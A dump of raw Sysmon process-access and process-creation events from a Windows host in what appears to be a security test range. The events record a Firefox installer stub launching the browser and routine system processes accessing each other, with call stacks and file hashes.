13:59:54.505{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.505{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.505{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.505{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.505{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.505{59A5CD1D-945A-6005-3205-00000000A301}43367056C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+a612|C:\Program Files\Mozilla Firefox\firefox.exe+10f9|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.513{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startupC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492MediumMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3205-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000016675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.505{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.505{59A5CD1D-945A-6005-3205-00000000A301}43367056C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+8f59|C:\Program Files\Mozilla Firefox\firefox.exe+10f9|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.474{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.474{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.474{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.474{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.474{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-945A-6005-3205-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-945A-6005-3205-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\System.dll+2965(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\System.dll+17cd(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe+13a8 154100x800000000000000016667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.480{59A5CD1D-945A-6005-3205-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startupC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe.\setup-stub.exe 10341000x800000000000000016666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.474{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-945A-6005-3205-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 